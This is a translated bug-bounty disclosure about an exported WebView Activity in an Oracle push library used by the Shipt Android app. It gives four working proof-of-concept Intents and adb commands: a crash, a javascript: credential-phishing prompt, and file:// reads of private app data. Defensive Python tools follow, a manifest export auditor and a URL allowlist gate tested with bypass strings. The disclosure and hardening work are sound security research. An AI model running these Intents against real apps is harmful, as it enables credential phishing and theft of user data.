Security vulnerability in an exported WebView Activity (translated article)

Original HackerOne report: (link)

Vulnerability summary:

An exported Activity in an Oracle library, com.pushio.manager.iam.ui.PushIOMessageViewActivity, allowed arbitrary links to be opened in a WebView without any scheme validation. After the issue was reported to Oracle, a patch was released for the library; Shipt then promptly updated to the patched library, fixing the vulnerability.

Vulnerability details

Hello, I would like to report a vulnerability I found: because the Activity com.pushio.manager.iam.ui.PushIOMessageViewActivity has exported=true, it can be exploited by third-party applications.

Vulnerability

com.pushio.manager.iam.ui.PushIOMessageViewActivity is exported (set to true), which makes the Activity vulnerable. The AndroidManifest.xml entry is as follows:

        <activity android:name="com.pushio.manager.iam.ui.PushIOMessageViewActivity" android:theme="@android:style/Theme.Translucent.NoTitleBar">
            <intent-filter>
                <action android:name="android.intent.action.VIEW"/>
                <category android:name="android.intent.category.DEFAULT"/>
                <category android:name="android.intent.category.BROWSABLE"/>
                <data android:scheme="@string/responsys_api_key"/>
            </intent-filter>
        </activity>
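As an added check (example tooling written for this article, not code from the PushIO library or the Shipt app): the manifest entry quoted above leaves android:exported unset, and a component that declares an <intent-filter> without that attribute is exported by default on apps targeting API levels below 31 (Android 12 makes the attribute mandatory for such components, so the implicit case only arises on older targets). The script below applies that rule to a constructed manifest that reproduces the PushIOMessageViewActivity declaration alongside hypothetical components (.MainActivity, .DeepLinkActivity, .InternalActivity) added only to exercise each branch, and flags which components any third-party app or adb can start directly.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"

# Constructed sample manifest (not the real Shipt manifest). The first entry
# reproduces the PushIOMessageViewActivity declaration quoted above; the
# others are hypothetical components added to exercise each rule.
SAMPLE_MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.app">
  <application>
    <activity android:name="com.pushio.manager.iam.ui.PushIOMessageViewActivity"
              android:theme="@android:style/Theme.Translucent.NoTitleBar">
      <intent-filter>
        <action android:name="android.intent.action.VIEW"/>
        <category android:name="android.intent.category.DEFAULT"/>
        <category android:name="android.intent.category.BROWSABLE"/>
        <data android:scheme="@string/responsys_api_key"/>
      </intent-filter>
    </activity>
    <activity android:name=".MainActivity" android:exported="true">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity>
    <activity android:name=".DeepLinkActivity" android:exported="false">
      <intent-filter>
        <action android:name="android.intent.action.VIEW"/>
        <category android:name="android.intent.category.BROWSABLE"/>
        <data android:scheme="https" android:host="app.example.com"/>
      </intent-filter>
    </activity>
    <activity android:name=".InternalActivity"/>
  </application>
</manifest>
"""


def _android_attr(element, name):
    """Read an android:-namespaced attribute, or None if it is absent."""
    return element.get("{%s}%s" % (ANDROID_NS, name))


def audit_exported_components(manifest_xml):
    """Return one record per activity/alias/service/receiver with its reachability verdict.

    Rule (for targetSdk < 31, where android:exported may be omitted): an explicit
    android:exported wins; otherwise the component is exported exactly when it
    declares at least one <intent-filter>. Providers follow different defaults
    and are deliberately left out.
    """
    root = ET.fromstring(manifest_xml)
    records = []
    for tag in ("activity", "activity-alias", "service", "receiver"):
        for element in root.iter(tag):
            filters = element.findall("intent-filter")
            declared = _android_attr(element, "exported")
            if declared is not None:
                exported = declared.strip().lower() == "true"
                reason = "explicit android:exported=%s" % declared
            else:
                exported = bool(filters)
                reason = ("implicit: intent-filter present, android:exported unset"
                          if filters else "implicit: no intent-filter")
            # BROWSABLE means a browser/deep link can reach it too, not just explicit intents.
            browsable = any(
                _android_attr(cat, "name") == "android.intent.category.BROWSABLE"
                for f in filters for cat in f.findall("category")
            )
            records.append({
                "tag": tag,
                "name": _android_attr(element, "name"),
                "exported": exported,
                "reason": reason,
                "browsable": browsable,
            })
    return records


def exported_names(manifest_xml):
    """Names of components that any third-party app (or adb) can start directly."""
    return [r["name"] for r in audit_exported_components(manifest_xml) if r["exported"]]


if __name__ == "__main__":
    for r in audit_exported_components(SAMPLE_MANIFEST):
        flag = "EXPORTED" if r["exported"] else "private "
        print("%s  %-60s %s%s" % (flag, r["name"], r["reason"],
                                  "  [BROWSABLE]" if r["browsable"] else ""))
```

Run it against a manifest decoded from the APK (for example the AndroidManifest.xml that apktool writes out); every component it reports as exported needs the same input validation you would apply to a network request, because the extras it receives are attacker-controlled.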

The problem lies in the com.pushio.manager.iam.ui.PushIOMessageViewActivity class, which lets you interact with the WebView:

protected void onStart() {
    ...
    Bundle extras = getIntent().getExtras();
    PIOLogger.d("PIOMVA oS extras: " + extras);
    if (extras != null) {
        final String content = extras.getString(Param.CONTENT);
        final String url = extras.getString("url");   // taken straight from the incoming Intent
        String viewType = extras.getString("type");
        ...
        if (TextUtils.isEmpty(viewType)) {
            PIOLogger.w("PIOMVA oS view type not found, closing window...");
            finish();
            return;
        } else if (viewType.equalsIgnoreCase(PushIOMessageViewType.ALERT.toString())) {
            ...
            public void run() {
                try {
                    if (PushIOMessageViewActivity.this.mActivityWeakReference != null && PushIOMessageViewActivity.this.mActivityWeakReference.get() != null && !((Activity) PushIOMessageViewActivity.this.mActivityWeakReference.get()).isFinishing()) {
                        PushIOMessageViewActivity.this.mPopupWindow.showAtLocation(PushIOMessageViewActivity.this.mParentLayout, 17, 0, 0);
                        if (!TextUtils.isEmpty(content)) {
                            PushIOMessageViewActivity.this.mWebView.loadDataWithBaseURL(null, content, "text/html", "utf-8", null);
                        } else if (TextUtils.isEmpty(url)) {
                            PushIOMessageViewActivity.this.finish();
                        } else {
                            PushIOMessageViewActivity.this.mWebView.loadUrl(url); // load custom url: no scheme check before loading
                        }
                    }
                } catch (BadTokenException e) {
                    PIOLogger.d("PIOMVA oSt " + e.getMessage());
                }

With a specially crafted Intent you can get past the if checks and load your own URL or JavaScript:

PushIOMessageViewActivity.this.mWebView.loadUrl(url); // load custom url

You can exploit this vulnerability from a console via adb or via my application HunterExploit.

PoC 1 - Kill Process - lets you stop the Shipt process - a threat to information availability. Java PoC:

Intent intent = new Intent("android.intent.action.VIEW");
intent.setClassName("com.shipt.groceries", "com.pushio.manager.iam.ui.PushIOMessageViewActivity");
intent.putExtra("url", "chrome://crash");   // Chromium's built-in crash page kills the renderer
intent.putExtra("type", "alert");           // needed to reach the loadUrl() branch
startActivity(intent);

adb PoC:

adb shell am start -n com.shipt.groceries/com.pushio.manager.iam.ui.PushIOMessageViewActivity -a "android.intent.action.VIEW" --es "url" "chrome://crash" --es "type" "alert"
PoC 2 - XSS - enables phishing attacks. Java PoC:

Intent intent = new Intent("android.intent.action.VIEW");
intent.setClassName("com.shipt.groceries", "com.pushio.manager.iam.ui.PushIOMessageViewActivity");
intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
// javascript: URL is executed by loadUrl() inside the app's WebView
intent.putExtra("url", "javascript:{var Login = window.prompt(\"Authorization: Login\", \"Input Login\");var Password = window.prompt(\"Authorization: Password\", \"Input Password\"); alert('Interception of data: '+Login+' '+Password)}");
intent.putExtra("type", "alert");
// start the app first and give it time to load, then fire the malicious Intent
Intent intentStart = new Intent(Intent.ACTION_MAIN);
intentStart.setComponent(new ComponentName("com.shipt.groceries", "com.shipt.groceries.MainActivity"));
startActivity(intentStart);
try {
    Thread.sleep(10000);
} catch (InterruptedException e) {
    e.printStackTrace();
}
startActivity(intent);

adb PoC:

adb shell am start -n com.shipt.groceries/com.shipt.groceries.MainActivity

Wait for the application to load, and then run the following command:

adb shell am start -n com.shipt.groceries/com.pushio.manager.iam.ui.PushIOMessageViewActivity -a "android.intent.action.VIEW" --es "url" "javascript:{window.prompt\(\'Authorization:Login\'\,\'Input_Login\'\)\;window.prompt\(\'Authorization:Password\'\,\'Input_Password\'\)}" --es "type" "alert"
PoC 3 - LFI - lets you read confidential user files without root access - a threat to information confidentiality. Java PoC:

Intent intent = new Intent("android.intent.action.VIEW");
intent.setClassName("com.shipt.groceries", "com.pushio.manager.iam.ui.PushIOMessageViewActivity");
// file: URL inside the app's private data directory, rendered by the app's own WebView
intent.putExtra("url", "file:///data/data/com.shipt.groceries/shared_prefs/pushio_store.xml");
intent.putExtra("type", "alert");
startActivity(intent);

adb PoC:

adb shell am start -n com.shipt.groceries/com.pushio.manager.iam.ui.PushIOMessageViewActivity -a "android.intent.action.VIEW" --es "url" "file:///data/data/com.shipt.groceries/shared_prefs/pushio_store.xml" --es "type" "alert"
PoC 4 - read a file from, or load a page out of, android_asset. Java PoC:

Intent intent = new Intent("android.intent.action.VIEW");
intent.setClassName("com.shipt.groceries", "com.pushio.manager.iam.ui.PushIOMessageViewActivity");
intent.putExtra("url", "file:///android_asset/www/index.html");
intent.putExtra("type", "alert");
startActivity(intent);

adb PoC:

adb shell am start -n com.shipt.groceries/com.pushio.manager.iam.ui.PushIOMessageViewActivity -a "android.intent.action.VIEW" --es "url" "file:///android_asset/www/index.html" --es "type" "alert"
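All four PoCs go through the same missing check: the "url" extra reaches loadUrl() with no validation of its scheme or host. The gate below is an added example written for this article, not the fix Oracle shipped (the page only says that patch added scheme validation) and not Shipt's code. It is a deny-by-default allowlist, which is stricter than a scheme check alone: only https URLs to a known host pass, so javascript:, file:, chrome:, content:, intent:, data: and about: URLs are all refused without enumerating them. The host app.example.com, and the names is_safe_webview_url and triage, are assumptions for the example; the four payloads are the ones from the PoCs above, and the control URLs are constructed.

```python
from urllib.parse import urlsplit

# Hypothetical allowlist for the example; a real app lists the hosts its
# in-app messages are actually served from.
ALLOWED_SCHEMES = frozenset({"https"})
ALLOWED_HOSTS = frozenset({"app.example.com"})


def is_safe_webview_url(url, allowed_schemes=ALLOWED_SCHEMES, allowed_hosts=ALLOWED_HOSTS):
    """Allowlist gate to run before WebView.loadUrl(url) on an untrusted extra.

    Deny by default: anything that is not an https URL to a known host is
    refused, which covers javascript:, file:, chrome:, content:, intent:,
    data: and about: without a blocklist of scheme names that could be missed.
    """
    if not isinstance(url, str) or not url:
        return False
    # Chromium strips leading C0 controls/whitespace and treats "\" like "/";
    # refuse them up front instead of guessing how the parser would normalise.
    if any(ch.isspace() or ord(ch) < 0x20 for ch in url) or "\\" in url:
        return False
    parts = urlsplit(url)  # lower-cases the scheme; .hostname lower-cases the host
    if parts.scheme.lower() not in allowed_schemes:
        return False
    if parts.username is not None or parts.password is not None:
        return False  # "https://app.example.com@evil.com/" style confusion
    host = (parts.hostname or "").lower()
    return host in allowed_hosts


def triage(urls):
    """Map each candidate URL to the gate's verdict (True = may be loaded)."""
    return {u: is_safe_webview_url(u) for u in urls}


# The four payloads from the PoCs above.
POC_PAYLOADS = [
    "chrome://crash",
    "javascript:{var Login = window.prompt(\"Authorization: Login\", \"Input Login\");}",
    "file:///data/data/com.shipt.groceries/shared_prefs/pushio_store.xml",
    "file:///android_asset/www/index.html",
]

# Constructed controls: two that should pass, four that probe common bypasses.
CONTROLS = [
    "https://app.example.com/inapp/message/42",   # legitimate message page
    "HTTPS://APP.EXAMPLE.COM/inapp/message/42",   # scheme/host are case-insensitive
    " javascript:alert(1)",                        # leading space before the scheme
    "https://app.example.com@evil.com/",           # userinfo trick, real host is evil.com
    "https://evil.com/?next=https://app.example.com",
    "app.example.com/inapp/message/42",            # no scheme at all
]

if __name__ == "__main__":
    for u, ok in triage(POC_PAYLOADS + CONTROLS).items():
        print("%s  %s" % ("ALLOW" if ok else "DENY ", u))
```

On the Android side the same decision belongs in the Activity immediately before loadUrl(), and it has to be repeated in WebViewClient.shouldOverrideUrlLoading() so that a redirect or a link inside an allowed page cannot navigate the WebView somewhere the allowlist would have refused. Independently of the gate, the WebView that shows in-app messages has no reason to read local files, so WebSettings.setAllowFileAccess(false), setAllowFileAccessFromFileURLs(false) and setAllowUniversalAccessFromFileURLs(false) remove the file: read path that PoC 3 and PoC 4 rely on even if a future code path skips the check; note that PoC 2 works because javascript: URLs handed to loadUrl() run in the page context whenever JavaScript is enabled.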

Link to this article:

https://www.linqi.net.cn/index.php/archives/479/